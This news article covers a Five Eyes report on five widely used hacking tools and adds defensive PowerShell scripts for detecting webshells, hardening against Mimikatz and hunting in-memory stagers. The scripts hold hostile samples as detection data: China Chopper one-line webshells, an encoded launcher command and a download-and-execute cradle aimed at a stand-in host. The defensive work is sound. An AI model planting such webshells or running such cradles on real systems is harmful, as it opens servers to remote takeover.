The national cybersecurity agencies of the United States, U.K., Canada, Australia and New Zealand, known in the intelligence world as the Five Eyes, have released a joint report on five publicly available hacking tools that are widely used in cyberattacks.
The report advises defenders on how to detect and protect systems against a remote access Trojan called JBiFrost, a webshell called China Chopper, a credential stealer called Mimikatz, a lateral movement framework called PowerShell Empire and a traffic obfuscation proxy called HUC Packet Transmitter.
“These tools have been used to compromise information across a wide range of critical sectors, including health, finance, government and defence,” the report authors said. “Their widespread availability presents a challenge for network defence and actor attribution.”
JBiFrost first appeared in May 2015 and is a variant of Adwind RAT, a program that has been used by APT groups in the past to target organizations from the aerospace and defense sectors.
Remote Access Trojans (RATs) provide attackers with administrative control over compromised computers and are often used to exfiltrate data and to deploy other tools that could allow attackers to pivot to other computers on local networks.
JBiFrost is written in Java and has versions for Windows, Linux, macOS and Android. It’s usually delivered as an attachment through phishing emails that pose as invoice notices, requests for quotation, remittance notices and shipment or payment notices.
“Since early 2018, we have observed an increase in JBiFrost RAT being used in targeted attacks against critical national infrastructure owners and their supply chain operators,” US-CERT said in an alert. “There has also been an increase in the RAT’s hosting on infrastructure located in our countries.”
China Chopper is a webshell that has been in widespread use since 2012. Webshells are small scripts deployed on compromised web servers that give remote attackers administrative access to the host through ordinary HTTP requests, so the attacker's commands arrive as normal-looking web traffic.
Over the past few months, attackers have been observed deploying China Chopper on web servers vulnerable to CVE-2017-3066, a remote code execution vulnerability in Adobe ColdFusion.
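Because the server side of a China Chopper deployment is a one-line script that passes a request parameter straight to the scripting engine's eval, a defender can sweep a web root for that shape. The script below is an added example and is not code from the report or from any of the agencies involved; the web root path, the file-size cutoff and the sample files it creates are constructed for the demonstration, and the signature patterns are the published server-side forms of China Chopper generalized to "eval of a request parameter" in ASPX, PHP and classic ASP.

```powershell
# Added example (not from the Five Eyes report): sweep a web root for China Chopper-style
# one-line webshells. $WebRoot and the sample files below are constructed for the demo.
param([string]$WebRoot = (Join-Path $env:TEMP 'chopper-demo'))

# Constructed sample tree: one benign page plus an ASPX and a PHP file in the published
# China Chopper server-side forms (the parameter name "password" is the attacker's choice).
New-Item -ItemType Directory -Force -Path $WebRoot | Out-Null
Set-Content -Path (Join-Path $WebRoot 'index.aspx') -Value '<%@ Page Language="C#" %><html>hello</html>'
Set-Content -Path (Join-Path $WebRoot 'img.aspx')   -Value '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>'
Set-Content -Path (Join-Path $WebRoot 'cache.php')  -Value '<?php @eval($_POST[''password'']);?>'

# Signatures: a script-engine eval() fed directly from a request parameter.
$Patterns = @(
    'eval\s*\(\s*Request\.Item\s*\[',              # ASPX / JScript form
    'eval\s*\(\s*Request\s*\[',                    # ASPX variant without .Item
    '@?eval\s*\(\s*\$_(POST|REQUEST|GET)\s*\[',    # PHP form
    'eval\s*\(\s*Request\.(Form|Item)\s*\(\s*"'    # classic ASP form (assumed variant)
)

function Find-ChopperShell {
    param(
        [string]$Path,
        [int]$MaxBytes = 8192   # one-liner shells are tiny; threshold is an assumption
    )
    Get-ChildItem -Path $Path -Recurse -File -Include *.php,*.asp,*.aspx,*.jsp,*.cfm |
        Where-Object { $_.Length -le $MaxBytes } |
        ForEach-Object {
            $text = Get-Content -Raw -Path $_.FullName
            foreach ($p in $Patterns) {
                if ($text -match $p) {
                    # Report the file once, with the pattern that fired and the mtime,
                    # which is usually the first thing an incident responder wants.
                    [pscustomobject]@{ File = $_.FullName; Pattern = $p; Modified = $_.LastWriteTime }
                    break
                }
            }
        }
}

Find-ChopperShell -Path $WebRoot | Format-Table -AutoSize
```

Run against the real web root instead of the demo directory by passing `-WebRoot`. A hit is a lead, not proof: confirm it by checking the file's modification time against the deployment history and by looking in the web server's access logs for POST requests to that path from unusual sources.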
Mimikatz is a tool created in 2007 that extracts Windows credentials, including plaintext passwords, password hashes and Kerberos tickets, from the memory of compromised computers. The tool is widely used by both penetration testers and attackers to obtain Windows domain credentials that enable lateral movement inside networks.
“Mimikatz has been used across multiple incidents by a broad range of threat actors for several years,” the US-CERT said in its alert. “In 2011, it was used by unknown threat actors to obtain administrator credentials from the Dutch certificate authority, DigiNotar. The rapid loss of trust in DigiNotar led to the company filing for bankruptcy within a month of this compromise.”
Mimikatz was also used in the NotPetya and BadRabbit ransomware attacks last year, enabling those threats to propagate through poorly secured networks.
“To prevent Mimikatz credential retrieval, network defenders should disable the storage of clear text passwords in LSASS memory,” the report authors advise. “This is default behavior for Windows 8.1/Server 2012 R2 and later, but can be specified on older systems which have the relevant security patches installed. Windows 10 and Windows Server 2016 systems can be protected by using newer security features, such as Credential Guard.”
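The "storage of clear text passwords in LSASS memory" in that advice is the WDigest authentication provider, controlled by the UseLogonCredential registry value that Microsoft's KB2871997 update introduced for older Windows versions. The script below is an added example, not code from the report: it audits that value, sets it to 0 (which also reverts the trick of an attacker flipping it to 1 before running Mimikatz), and checks whether Credential Guard is configured and running via the Win32_DeviceGuard WMI class. Run it elevated.

```powershell
# Added example (not from the Five Eyes report): audit and apply the two Mimikatz
# mitigations the report recommends. Run in an elevated PowerShell session.
$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Get-WDigestState {
    # UseLogonCredential = 1 keeps plaintext passwords in LSASS; 0 disables that.
    # On Windows 8.1 / Server 2012 R2 and later the value is normally absent and
    # the built-in default is 0; on patched older systems absent means 1.
    $v = (Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    [pscustomobject]@{
        UseLogonCredential = $v
        ExplicitlyDisabled = ($v -eq 0)
        ExplicitlyEnabled  = ($v -eq 1)   # attacker-set value worth alerting on
    }
}

function Disable-WDigestCaching {
    # Write an explicit 0. Secrets already cached for logged-on users stay in LSASS
    # until those users log off or the host reboots.
    if (-not (Test-Path $WDigestKey)) { New-Item -Path $WDigestKey -Force | Out-Null }
    Set-ItemProperty -Path $WDigestKey -Name UseLogonCredential -Value 0 -Type DWord
}

function Get-CredentialGuardState {
    # SecurityServicesConfigured / SecurityServicesRunning are arrays of service IDs;
    # 1 is Credential Guard, 2 is hypervisor-enforced code integrity (HVCI).
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Configured = ($dg.SecurityServicesConfigured -contains 1)
        Running    = ($dg.SecurityServicesRunning -contains 1)
    }
}

$before = Get-WDigestState
if ($before.UseLogonCredential -ne 0) { Disable-WDigestCaching }
Get-WDigestState
Get-CredentialGuardState
```

The explicit 0 is harmless on systems where the default is already 0 and is the setting to push by Group Policy Preferences across the estate; a host where the value reads 1 should be treated as a possible Mimikatz precursor and investigated, not just corrected. Credential Guard additionally needs UEFI, Secure Boot and virtualization support, so a result of Configured but not Running usually points at one of those prerequisites.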
PowerShell Empire is a post-exploitation framework that was designed in 2015 as a penetration testing tool. It uses the legitimate PowerShell scripting language, which is intended for automating Windows management tasks, and can operate entirely in memory, making it difficult to detect.
PowerShell Empire provides attackers with the ability to escalate privileges, harvest credentials, exfiltrate information and move laterally across a network. It is popular with both state-actor hacker groups and cybercriminals and has been observed in security breaches across a wide range of sectors.
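The practical counter to "operates entirely in memory" is to make PowerShell itself record what it executes: script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) captures the de-obfuscated content of every block the engine runs, including a base64-encoded stager that never touches disk, and it is available from PowerShell 5.0 onward. The script below is an added example and is not code from the report or from the Empire project. It enables script block and module logging through the standard PowerShell policy registry keys, scores script blocks against launcher traits (the `-noP -w 1 -enc` shape Empire has historically used, download-and-execute cradles, base64 decoding, AMSI tampering), and applies that scoring to constructed sample strings and then to the live event log; the indicator list and the score threshold are assumptions to tune locally.

```powershell
# Added example (not from the Five Eyes report or the Empire project): turn on the
# PowerShell logging that exposes in-memory tooling, then hunt Event ID 4104 for
# stager traits. The indicator list and $SampleBlocks are constructed for the demo.
$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    # Script block logging: records every block PowerShell executes, already decoded.
    $sbl = Join-Path $PolicyRoot 'ScriptBlockLogging'
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord
    # Module logging for all modules ('*'): pipeline-level detail of cmdlet calls.
    $ml = Join-Path $PolicyRoot 'ModuleLogging'
    New-Item -Path (Join-Path $ml 'ModuleNames') -Force | Out-Null
    Set-ItemProperty -Path $ml -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path (Join-Path $ml 'ModuleNames') -Name '*' -Value '*'
}

# Traits of PowerShell download-and-execute stagers; -match is case-insensitive.
$Indicators = @(
    '-(enc|encodedcommand)\b',                 # base64-encoded command line
    '-(nop|noprofile)\b',                      # skip profile (quiet start)
    '-w(indowstyle)?\s+(1|hidden)\b',          # hidden window
    '\bIEX\b|Invoke-Expression',               # evaluate downloaded text
    'Net\.WebClient|DownloadString|DownloadData',
    'FromBase64String',
    'ExecutionPolicy\s+Bypass|-ep\s+bypass',
    'AmsiUtils|amsiInitFailed'                 # AMSI tampering
)

function Get-ScriptBlockScore {
    param([string]$Text)
    $hits = @(foreach ($i in $Indicators) { if ($Text -match $i) { $i } })
    [pscustomobject]@{ Score = $hits.Count; Hits = ($hits -join ', ') }
}

# Constructed samples: a benign admin one-liner, a launcher-shaped command line,
# and the decoded download cradle such a launcher typically carries.
$SampleBlocks = @(
    'Get-Service | Where-Object Status -eq Running | Export-Csv C:\temp\services.csv',
    'powershell -noP -sta -w 1 -enc JABjAGwAaQBlAG4AdAA=',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/launcher")'
)
foreach ($b in $SampleBlocks) { Get-ScriptBlockScore -Text $b }

function Find-SuspiciousScriptBlocks {
    param([int]$MinScore = 2, [int]$MaxEvents = 1000)   # threshold is an assumption
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $s = Get-ScriptBlockScore -Text $_.Message
            if ($s.Score -ge $MinScore) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Score   = $s.Score
                    Hits    = $s.Hits
                    Snippet = $_.Message.Substring(0, [Math]::Min(120, $_.Message.Length))
                }
            }
        }
}

Enable-PowerShellLogging
Find-SuspiciousScriptBlocks | Format-Table -AutoSize
```

Logging has to be in place before the intrusion to be useful, so the registry settings are best delivered by Group Policy, with the Operational log forwarded off the host; a local attacker with administrative rights can clear it. The indicator scoring produces leads rather than verdicts, since legitimate deployment tooling also uses encoded commands, so tune the list against a baseline of the environment's normal administrative scripts before alerting on it.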
The HUC Packet Transmitter (HTran) is a proxy tool that dates back to 2009 and is capable of intercepting and redirecting TCP traffic. Attackers often use it to obfuscate malicious traffic or to proxy their communications through legitimate servers.
HTran can be used to evade intrusion detection systems, to bypass security controls by blending malicious traffic into common traffic or by abusing domain trust relationships, and to hide the true source and destination of malware command-and-control communications.
“Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques,” the report authors said. “Even the most sophisticated groups use common, publicly-available tools to achieve their objectives.”